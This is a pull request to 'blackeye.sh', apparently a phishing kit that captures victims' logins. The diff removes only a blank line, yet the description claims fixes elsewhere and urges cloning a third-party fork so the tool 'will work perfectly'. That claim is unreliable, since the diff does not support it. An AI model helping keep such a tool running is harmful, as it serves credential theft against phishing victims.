### PR TITLE
Fixed the problem of Empty Victim link

### DIFF
--- a/blackeye.sh
+++ b/blackeye.sh
@@ -5,7 +5,6 @@
 
 trap 'printf "\n";stop;exit 1' 2
 
-
 dependencies() {
 
 command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }


### PR DESCRIPTION
In the `/blackeye.sh` file, at line 436 there is different outdated or irrelevant commands which are already FIXED in my repository.
You can `git clone https://github.com/MAS012/Blackeye-V2` straight ahead and Blackeye will work perfectly.